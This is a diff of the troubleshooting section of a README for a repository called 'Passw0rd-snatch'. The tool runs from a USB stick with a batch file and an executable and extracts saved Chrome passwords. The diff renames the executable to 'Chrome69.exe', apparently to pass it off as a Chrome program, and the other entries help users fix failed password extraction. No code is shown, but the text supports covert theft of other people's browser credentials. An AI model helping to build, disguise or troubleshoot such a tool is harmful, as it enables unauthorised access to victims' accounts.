Lostboy069/Passw0rd-snatch/README.md

 ## 🐛 Troubleshooting

 - **“myfile.exe not found”**:
-  - Ensure `myfile.exe` is in the USB root alongside the `.bat` file.
+  - Ensure `Chrome69.exe` is in the USB root alongside the `.bat` file.
 - **No passwords extracted**:
   - Verify Chrome has saved passwords.
   - Check if Chrome’s password database is encrypted with a master password (rare).